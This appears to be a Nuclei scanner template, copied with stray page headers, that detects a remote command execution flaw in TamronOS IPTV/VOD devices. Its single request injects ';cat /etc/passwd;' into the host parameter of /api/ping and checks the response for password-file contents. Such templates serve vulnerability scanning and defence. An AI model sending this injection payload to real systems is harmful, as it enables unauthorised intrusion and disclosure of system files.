25 lines
475 B
YAML
25 lines
475 B
YAML
id: tamronos-rce
|
|
|
|
info:
|
|
name: TamronOS IPTV/VOD RCE
|
|
author: pikpikcu
|
|
severity: critical
|
|
reference: https://twitter.com/sec715/status/1405336456923471874
|
|
tags: tamronos,rce
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|